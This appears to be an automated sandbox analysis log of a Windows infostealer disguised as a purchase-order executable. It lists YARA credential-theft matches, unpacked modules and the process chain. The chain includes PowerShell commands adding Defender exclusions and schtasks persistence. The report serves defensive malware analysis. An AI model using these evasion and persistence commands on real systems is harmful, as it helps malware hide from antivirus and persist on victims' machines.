                    Source: 0.2.purchase order - PO-011024-201.exe.5b20000.8.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
                    .NET source code contains very large strings
                    Source: purchase order - PO-011024-201.exe, frm_login.csLong String: Length: 97210
                    Source: jDCErdK.exe.0.dr, frm_login.csLong String: Length: 97210
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: purchase order - PO-011024-201.exe
                    Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
                    Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini
                    Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\inf\WmiApRpl\
                    Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\inf\WmiApRpl\WmiApRpl.h
                    Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\inf\WmiApRpl\WmiApRpl.ini
                    Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\inf\WmiApRpl\0009\
                    Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\PerfStringBackup.TMP
                    Source: C:\Windows\System32\wbem\WMIADAP.exeFile deleted: C:\Windows\System32\wbem\Performance\WmiApRpl.h
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeCode function: 0_2_0084D5BC0_2_0084D5BC
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeCode function: 0_2_050625380_2_05062538
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeCode function: 0_2_050625480_2_05062548
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeCode function: 0_2_050667180_2_05066718
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeCode function: 0_2_050667280_2_05066728
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeCode function: 0_2_050626DB0_2_050626DB
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeCode function: 0_2_050661720_2_05066172
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeCode function: 0_2_050661780_2_05066178
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeCode function: 0_2_05066F780_2_05066F78
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeCode function: 0_2_05066F880_2_05066F88
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeCode function: 0_2_0506DEB80_2_0506DEB8
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeCode function: 0_2_050609E80_2_050609E8
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeCode function: 0_2_050609F80_2_050609F8
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeCode function: 0_2_0506FA500_2_0506FA50
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeCode function: 0_2_0506DA800_2_0506DA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01314A988_2_01314A98
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01313E808_2_01313E80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_013141C88_2_013141C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0131F8A58_2_0131F8A5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_069A45A08_2_069A45A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_069A35788_2_069A3578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_069AE0B98_2_069AE0B9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_069A10308_2_069A1030
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_069A91E08_2_069A91E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_069AA1408_2_069AA140
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_069A5D308_2_069A5D30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_069A56508_2_069A5650
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_069AC3588_2_069AC358
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_069A3C8F8_2_069A3C8F
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeCode function: 9_2_0109D5BC9_2_0109D5BC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00DCA96813_2_00DCA968
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00DC4A9813_2_00DC4A98
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00DC3E8013_2_00DC3E80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00DC41C813_2_00DC41C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00DCF8A513_2_00DCF8A5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_06145D3013_2_06145D30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0614357813_2_06143578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_061445A013_2_061445A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0614033813_2_06140338
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0614E0B913_2_0614E0B9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0614A14013_2_0614A140
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_061491F013_2_061491F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0614C61813_2_0614C618
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0614565013_2_06145650
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_06143CA013_2_06143CA0
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1693602582.00000000025E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs purchase order - PO-011024-201.exe
                    Source: purchase order - PO-011024-201.exe, 00000000.00000000.1644321898.0000000000196000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametreesize-8.61-installer_xbs-W52.exe vs purchase order - PO-011024-201.exe
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1724199163.0000000005B20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs purchase order - PO-011024-201.exe
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1729590315.000000000CF60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs purchase order - PO-011024-201.exe
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1728753559.0000000007703000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs purchase order - PO-011024-201.exe
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1695549066.0000000003FF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename8854fa4e-ee03-4899-b0c3-2df80b3f7614.exe4 vs purchase order - PO-011024-201.exe
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1695549066.0000000003FF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs purchase order - PO-011024-201.exe
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1692320796.0000000000868000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs purchase order - PO-011024-201.exe
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1693602582.0000000002581000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename8854fa4e-ee03-4899-b0c3-2df80b3f7614.exe4 vs purchase order - PO-011024-201.exe
                    Source: purchase order - PO-011024-201.exeBinary or memory string: OriginalFilenametreesize-8.61-installer_xbs-W52.exe vs purchase order - PO-011024-201.exe
                    Source: purchase order - PO-011024-201.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 9.2.jDCErdK.exe.3da9108.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.jDCErdK.exe.3de3b28.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.purchase order - PO-011024-201.exe.40782a8.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.jDCErdK.exe.3de3b28.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.purchase order - PO-011024-201.exe.40782a8.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.jDCErdK.exe.3da9108.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, RsYAkkzVoy.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, Kqqzixk.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, xROdzGigX.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, ywes.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, iPVW0zV.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, 1Pi9sgbHwoV.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, YUgDfWK2g4.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, YUgDfWK2g4.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, MarWtcu.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, MarWtcu.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, MarWtcu.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, MarWtcu.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, fsrIvttXdmKqMmWchj.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, fsrIvttXdmKqMmWchj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, fsrIvttXdmKqMmWchj.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, fsrIvttXdmKqMmWchj.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, fsrIvttXdmKqMmWchj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, fsrIvttXdmKqMmWchj.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, UAqO0Z5BuvB48Dfytc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, UAqO0Z5BuvB48Dfytc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.purchase order - PO-011024-201.exe.25e0908.4.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: 0.2.purchase order - PO-011024-201.exe.2601174.2.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: 0.2.purchase order - PO-011024-201.exe.7530000.10.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: 0.2.purchase order - PO-011024-201.exe.2598278.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/25@2/2
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeFile created: C:\Users\user\AppData\Roaming\jDCErdK.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
                    Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
                    Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
                    Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
                    Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7988:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeFile created: C:\Users\user\AppData\Local\Temp\tmpA55D.tmpJump to behavior
                    Source: purchase order - PO-011024-201.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: purchase order - PO-011024-201.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: purchase order - PO-011024-201.exe, 00000000.00000000.1644231926.00000000000A2000.00000002.00000001.01000000.00000003.sdmp, jDCErdK.exe.0.drBinary or memory string: INSERT INTO tab_grade (gId, gName) VALUES(NULL, @gName);SELECT @@IDENTITY# Add successfullyInfo%Add unsuccessfully-Grade name not changed
                    Source: purchase order - PO-011024-201.exeReversingLabs: Detection: 31%
                    Source: purchase order - PO-011024-201.exeVirustotal: Detection: 35%
                    Source: purchase order - PO-011024-201.exeString found in binary or memory: InternalNametreesize-8.61-installer_xbs-W52.exe
                    Source: purchase order - PO-011024-201.exeString found in binary or memory: OriginalFilenametreesize-8.61-installer_xbs-W52.exe
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeFile read: C:\Users\user\Desktop\purchase order - PO-011024-201.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\purchase order - PO-011024-201.exe "C:\Users\user\Desktop\purchase order - PO-011024-201.exe"
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jDCErdK.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmpA55D.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\jDCErdK.exe C:\Users\user\AppData\Roaming\jDCErdK.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmp981A.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jDCErdK.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmpA55D.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmp981A.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
